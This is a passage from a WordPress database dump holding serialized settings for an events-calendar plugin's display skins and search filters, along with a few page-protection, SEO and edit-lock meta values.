20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:22:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"266611\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:9:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:26:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"0\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:17:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(137375,264438,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137376,264438,'sf_status','0'),(137377,264438,'sf_display_label','0'),(137378,264438,'show_past_events','1'),(137379,264438,'show_only_past_events','0'),(137380,264438,'show_only_ongoing_events','0'),(137381,264437,'_wp_page_template','default'),(137382,264437,'passster_activate_global_protection',NULL),(137383,264437,'passster_activate_protection',NULL),(137384,264437,'passster_protection_type','password'),(137385,264437,'boldgrid_hide_page_title','0'),(137386,264437,'boldgrid_in_page_containers','1'),(137387,264437,'bgseo_robots_index','index'),(137388,264437,'bgseo_robots_follow','follow'),(137389,264440,'protect_children',''),(137390,264440,'_edit_lock','1621463242:2'),(137391,264440,'_edit_last','2'),(137392,264441,'protect_children',''),(137393,264441,'label',''),(137394,264441,'category','111'),(137395,264441,'location',''),(137396,264441,'organizer',''),(137397,264441,'tag',''),(137398,264441,'author',''),(137399,264441,'skin','monthly_view'),(137400,264441,'sk-options','a:18:{s:4:\"list\";a:30:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:32:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:25:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:15:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264605\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, 